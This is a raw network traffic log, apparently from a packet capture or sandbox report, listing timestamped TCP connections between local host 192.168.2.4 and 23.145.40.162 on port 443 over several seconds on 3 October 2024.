Oct 3, 2024 12:28:42.983851910 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.983952999 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:42.983968019 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.983988047 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.984024048 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.000237942 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.000299931 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.000343084 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.000385046 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.000415087 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.009794950 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.009841919 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.009880066 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.009895086 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.009924889 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.010819912 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.010859013 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.010896921 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.010915995 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.010941029 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.030138016 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.030250072 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.030287027 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.050031900 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.050148010 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.050184011 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.050204992 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.050239086 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.050964117 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.051071882 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.051106930 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.051126957 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.051157951 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.051616907 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.051697969 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.051714897 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.068451881 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.068536997 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.068551064 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.078753948 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.078800917 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.078838110 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.078851938 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.078881979 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.088609934 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.088638067 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.088701010 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.088713884 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.089339972 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.089373112 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.089409113 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.089421034 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.089447021 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.098202944 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.098284006 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.098295927 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.098860979 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.098939896 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.098951101 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.099530935 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.099600077 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.099611044 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.100423098 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.100500107 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.100512028 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.118460894 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.118551016 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.118561983 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.138209105 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.138307095 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.138319016 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.138614893 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.138654947 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.138689041 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.138700008 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.138727903 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.139224052 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.139303923 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.139314890 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.140043974 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.140111923 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.140122890 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.140562057 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.140639067 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.140650034 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.141099930 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.141169071 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.141180038 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.141789913 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.141864061 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.141875029 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.157031059 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.157128096 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.157141924 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.157599926 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.157664061 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.157675028 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.176923037 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.176997900 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.177011013 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.177295923 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.177351952 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.177362919 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.177409887 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.177489042 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.177509069 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.177577972 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.209815025 CEST	49767	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.209901094 CEST	443	49767	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.209964037 CEST	49767	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.210256100 CEST	49767	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.210285902 CEST	443	49767	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.808799982 CEST	443	49767	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.808871984 CEST	49767	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.810113907 CEST	49767	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.810131073 CEST	443	49767	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.810457945 CEST	443	49767	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:43.811270952 CEST	49767	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.811305046 CEST	49767	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:43.811358929 CEST	443	49767	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:44.091898918 CEST	443	49767	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:44.091962099 CEST	443	49767	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:44.092052937 CEST	49767	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:44.092178106 CEST	49767	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:44.092202902 CEST	443	49767	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:44.092219114 CEST	49767	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:44.092226982 CEST	443	49767	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:44.099028111 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:44.099057913 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:44.099216938 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:44.099360943 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:44.099370956 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:44.686942101 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:44.687053919 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:44.688203096 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:44.688210011 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:44.688524008 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:44.691934109 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:44.691946983 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:44.691951036 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:44.969445944 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:44.969517946 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:44.969607115 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:45.003417969 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:45.003428936 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:45.003441095 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:45.003446102 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:45.167207956 CEST	49769	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:45.167304993 CEST	443	49769	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:45.167418957 CEST	49769	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:45.167655945 CEST	49769	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:45.167692900 CEST	443	49769	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:45.764070034 CEST	443	49769	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:45.764157057 CEST	49769	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:45.768908978 CEST	49769	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:45.768939972 CEST	443	49769	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:45.769979954 CEST	443	49769	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:45.770720005 CEST	49769	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:45.771245003 CEST	49769	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:45.771306992 CEST	443	49769	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:46.041999102 CEST	443	49769	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:46.042152882 CEST	443	49769	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:46.042254925 CEST	49769	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:46.042339087 CEST	443	49769	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:46.042380095 CEST	49769	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:46.042399883 CEST	443	49769	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:46.052700996 CEST	49770	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:46.052752018 CEST	443	49770	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:46.052874088 CEST	49770	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:46.053230047 CEST	49770	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:46.053260088 CEST	443	49770	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:46.641405106 CEST	443	49770	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:46.641505003 CEST	49770	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:46.643141985 CEST	49770	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:46.643168926 CEST	443	49770	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:46.643965006 CEST	443	49770	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:46.644665003 CEST	49770	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:46.644706011 CEST	49770	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:46.644723892 CEST	443	49770	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:47.014753103 CEST	443	49770	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:47.014887094 CEST	443	49770	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:47.015014887 CEST	49770	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:47.015104055 CEST	49770	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:47.015120983 CEST	443	49770	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:47.015130997 CEST	49770	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:47.015136957 CEST	443	49770	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:47.019474030 CEST	49771	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:47.019517899 CEST	443	49771	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:47.019628048 CEST	49771	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:47.019855022 CEST	49771	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:47.019874096 CEST	443	49771	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:47.797774076 CEST	443	49771	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:47.797863007 CEST	49771	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:47.820261955 CEST	49771	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:47.820285082 CEST	443	49771	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:47.821302891 CEST	443	49771	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:47.822418928 CEST	49771	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:47.822448015 CEST	49771	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:47.822453976 CEST	443	49771	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:48.074702978 CEST	443	49771	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:48.074841976 CEST	443	49771	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:48.075028896 CEST	49771	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:48.075028896 CEST	49771	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:48.075028896 CEST	49771	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:48.075062037 CEST	443	49771	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:48.082489014 CEST	49772	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:48.082519054 CEST	443	49772	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:48.082592964 CEST	49772	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:48.082917929 CEST	49772	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:48.082931042 CEST	443	49772	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:48.434022903 CEST	49771	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:48.434056044 CEST	443	49771	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:48.676542044 CEST	443	49772	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:48.676604986 CEST	49772	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:48.680341005 CEST	49772	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:48.680347919 CEST	443	49772	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:48.680661917 CEST	443	49772	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:48.681842089 CEST	49772	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:48.681858063 CEST	49772	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:48.681916952 CEST	443	49772	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:48.955559015 CEST	443	49772	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:48.955712080 CEST	443	49772	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:48.955895901 CEST	49772	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:48.955936909 CEST	49772	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:48.955950022 CEST	443	49772	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:48.955964088 CEST	49772	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:48.955967903 CEST	443	49772	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:48.958966970 CEST	49773	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:48.959012032 CEST	443	49773	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:48.959083080 CEST	49773	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:48.959369898 CEST	49773	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:48.959403992 CEST	443	49773	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:49.554816008 CEST	443	49773	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:49.554893017 CEST	49773	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:49.558293104 CEST	49773	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:49.558305979 CEST	443	49773	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:49.558625937 CEST	443	49773	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:49.559937954 CEST	49773	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:49.560425997 CEST	49773	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:49.560456991 CEST	443	49773	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:50.644439936 CEST	443	49773	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:50.644587994 CEST	443	49773	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:50.644624949 CEST	49773	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:50.644624949 CEST	49773	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:50.644673109 CEST	443	49773	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:50.644691944 CEST	49773	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:50.644697905 CEST	443	49773	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:50.663017988 CEST	49774	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:50.663053036 CEST	443	49774	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:50.663115025 CEST	49774	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:50.663429022 CEST	49774	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:50.663435936 CEST	443	49774	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:51.278906107 CEST	443	49774	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:51.279009104 CEST	49774	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:51.284091949 CEST	49774	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:51.284102917 CEST	443	49774	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:51.284424067 CEST	443	49774	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:51.285116911 CEST	49774	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:51.285157919 CEST	49774	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:51.285176992 CEST	443	49774	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:51.566812038 CEST	443	49774	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:51.566956043 CEST	443	49774	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:51.567014933 CEST	49774	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:51.568057060 CEST	49774	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:51.568072081 CEST	443	49774	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:51.568089962 CEST	49774	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:51.568095922 CEST	443	49774	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:51.601907969 CEST	49775	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:51.601936102 CEST	443	49775	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:51.602001905 CEST	49775	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:51.602258921 CEST	49775	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:51.602272987 CEST	443	49775	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:52.189418077 CEST	443	49775	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:52.189529896 CEST	49775	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:52.190645933 CEST	49775	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:52.190665007 CEST	443	49775	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:52.191142082 CEST	443	49775	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:52.192118883 CEST	49775	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:52.192148924 CEST	49775	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:52.192158937 CEST	443	49775	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:52.469000101 CEST	443	49775	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:52.469146967 CEST	443	49775	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:52.469259024 CEST	49775	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:52.469366074 CEST	49775	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:52.469378948 CEST	443	49775	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:52.469393015 CEST	49775	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:52.469398022 CEST	443	49775	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:52.488833904 CEST	49776	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:52.488935947 CEST	443	49776	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:52.489010096 CEST	49776	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:52.489279985 CEST	49776	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:52.489312887 CEST	443	49776	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:53.092928886 CEST	443	49776	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:53.093077898 CEST	49776	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:53.097899914 CEST	49776	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:53.097913027 CEST	443	49776	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:53.098233938 CEST	443	49776	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:53.101643085 CEST	49776	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:53.101665020 CEST	49776	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:53.101671934 CEST	443	49776	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:53.374829054 CEST	443	49776	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:53.374979973 CEST	443	49776	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:53.375159979 CEST	49776	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:53.376112938 CEST	49776	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:53.376135111 CEST	443	49776	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:53.376152992 CEST	49776	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:53.376161098 CEST	443	49776	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:53.382420063 CEST	49777	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:53.382522106 CEST	443	49777	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:53.382608891 CEST	49777	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:53.382883072 CEST	49777	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:53.382903099 CEST	443	49777	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:53.975459099 CEST	443	49777	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:53.975552082 CEST	49777	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:53.976619005 CEST	49777	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:53.976638079 CEST	443	49777	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:53.976974010 CEST	443	49777	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:53.977716923 CEST	49777	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:53.977761984 CEST	49777	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:53.977816105 CEST	443	49777	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:54.252250910 CEST	443	49777	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:54.252413988 CEST	443	49777	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:54.252473116 CEST	49777	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:54.252549887 CEST	443	49777	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:54.252594948 CEST	49777	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:54.252594948 CEST	49777	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:54.252618074 CEST	443	49777	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:54.252636909 CEST	443	49777	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:54.259521008 CEST	49778	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:54.259573936 CEST	443	49778	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:54.259653091 CEST	49778	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:54.259905100 CEST	49778	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:54.259922028 CEST	443	49778	23.145.40.162	192.168.2.4
